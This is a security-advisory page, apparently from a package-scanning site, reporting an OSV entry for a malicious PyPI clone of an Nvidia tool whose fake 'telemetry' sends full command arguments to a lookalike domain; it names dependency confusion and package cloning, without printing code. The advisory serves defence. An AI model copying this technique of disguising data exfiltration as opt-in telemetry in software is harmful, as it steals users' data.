skillspector @2.3.10
Vulnerability report · Last retrieved from osv.dev June 28, 2026 at 10:54 PM UTC
OSV ID
MAL-2026-6561
Ecosystem
pypi
Summary
This package is a modified, unofficial version of the Nvidia project (https://github.com/NVIDIA/skillspector). The modification is disguised as telemetry. The project's README describes the telemetry as opt-in, anonymous usage reporting of selected data added by the redistributor. In fact the "telemetry" uses a default domain suggesting it belongs to Nvidia's LiveKit project and exfiltrates full command arguments on every CLI invocation. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-skillspector Reasons (based on the campaign): - clones-real-package - exfiltration-generic - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk. - dependency-confusion
Source: kam193 (939ac54a8a665e3e0c6f1c33a59d8a3afb0d3d2c827c30a701973777cd39ff19)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.